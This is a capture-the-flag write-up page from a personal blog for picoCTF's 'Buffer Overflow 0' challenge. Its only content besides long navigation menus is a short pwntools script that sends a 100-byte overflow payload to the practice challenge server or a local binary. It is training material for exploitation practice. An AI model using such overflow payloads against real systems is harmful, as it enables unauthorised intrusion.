d3bo
Ctf
    • Logo Platforms & Categories
        • pwn Reto 07
      • pwn Echo Chamber
      • pwn Haunted Library
      • pwn Locked Out
      • pwn bofbof
      • pwn Bonus Points
      • hardware Debugging Interface
      • pwn Execute
      • web PDFy
      • pwn Restaurant
      • pwn Rookie Mistake
      • pwn Rookie Salvation
      • hardware The Needle
      • pwn addition
      • pwn babybof
      • pwn 4enraya
      • pwn Anbu
      • pwn Armeria
      • pwn babyrop
      • pwn Server Status
      • pwn babygame01
      • pwn basic-file-exploit
      • pwn Buffer Overflow 0
      • pwn Buffer Overflow 1
      • pwn Buffer Overflow 2
      • pwn Buffer Overflow 3
      • pwn clutter-overflow
      • pwn CVE-XXXX-XXXXX
      • pwn Echo Valley
      • pwn Flag Leak
      • pwn Format strings 0
      • pwn Format strings 1
      • pwn Format strings 2
      • pwn Format strings 3
      • pwn Function overwrite
      • pwn Guessing Game 1
      • pwn Guessing Game 2
      • pwn hash-only-1
      • pwn hash-only-2
      • pwn Heap 0
      • pwn Heap 1
      • pwn Heap 2
      • pwn Heap 3
      • pwn Here's a LIBC
      • pwn Hijacking
      • pwn Local Target
      • pwn Picker IV
      • pwn PIE TIME
      • pwn PIE TIME 2
      • pwn ropfu
      • pwn RPS
      • pwn Stonks
      • pwn tic-tac
      • pwn two-sum
      • pwn Unsubscriptions Are Free
      • pwn VNE
      • pwn x-sixty-what
      • pwn badchars
      • pwn callme
      • pwn fluff
      • pwn pivot
      • pwn ret2csu
      • pwn ret2win
      • pwn split
      • pwn write4
      • pwn Old Memes Never Die
      • pwn Affirmation Bot
    d3bo
    • CTF
    • Writeups
    • Blog
    • Archive
    • About
    • Twitter
    • GitHub
    Support
    Support

    Search

    Loading search index…

    No recent searches

    No results for "Query here"

    • to select
    • to navigate
    • to close

    Search by FlexSearch

      • Logo Platforms & Categories
          • pwn Reto 07
        • pwn Echo Chamber
        • pwn Haunted Library
        • pwn Locked Out
        • pwn bofbof
        • pwn Bonus Points
        • hardware Debugging Interface
        • pwn Execute
        • web PDFy
        • pwn Restaurant
        • pwn Rookie Mistake
        • pwn Rookie Salvation
        • hardware The Needle
        • pwn addition
        • pwn babybof
        • pwn 4enraya
        • pwn Anbu
        • pwn Armeria
        • pwn babyrop
        • pwn Server Status
        • pwn babygame01
        • pwn basic-file-exploit
        • pwn Buffer Overflow 0
        • pwn Buffer Overflow 1
        • pwn Buffer Overflow 2
        • pwn Buffer Overflow 3
        • pwn clutter-overflow
        • pwn CVE-XXXX-XXXXX
        • pwn Echo Valley
        • pwn Flag Leak
        • pwn Format strings 0
        • pwn Format strings 1
        • pwn Format strings 2
        • pwn Format strings 3
        • pwn Function overwrite
        • pwn Guessing Game 1
        • pwn Guessing Game 2
        • pwn hash-only-1
        • pwn hash-only-2
        • pwn Heap 0
        • pwn Heap 1
        • pwn Heap 2
        • pwn Heap 3
        • pwn Here's a LIBC
        • pwn Hijacking
        • pwn Local Target
        • pwn Picker IV
        • pwn PIE TIME
        • pwn PIE TIME 2
        • pwn ropfu
        • pwn RPS
        • pwn Stonks
        • pwn tic-tac
        • pwn two-sum
        • pwn Unsubscriptions Are Free
        • pwn VNE
        • pwn x-sixty-what
        • pwn badchars
        • pwn callme
        • pwn fluff
        • pwn pivot
        • pwn ret2csu
        • pwn ret2win
        • pwn split
        • pwn write4
        • pwn Old Memes Never Die
        • pwn Affirmation Bot
      1. Home
      2. Ctf
      3. PicoCTF
      4. Buffer Overflow 0

      Buffer Overflow 0

      pico
      pwn

      July 24, 20251 minute

      #!/usr/bin/env python3
      
      from pwn import *
      
      exe = ELF("./vuln_patched")
      
      context.binary = exe
      
      
      def conn():
          if args.LOCAL:
              r = process([exe.path])
              if args.GDB:
                  gdb.attach(r)
          else:
              r = remote("saturn.picoctf.net", 60804)
      
          return r
      
      
      def main():
          r = conn()
          payload = 'A' * 100
          r.sendlineafter(':', payload)
          # good luck pwning :)
      
          r.interactive()
      
      
      if __name__ == "__main__":
          main()
      
      Prev
      Buffer Overflow 2
      Next
      Buffer Overflow 3
      • Tags
      • Brought to you by Hyas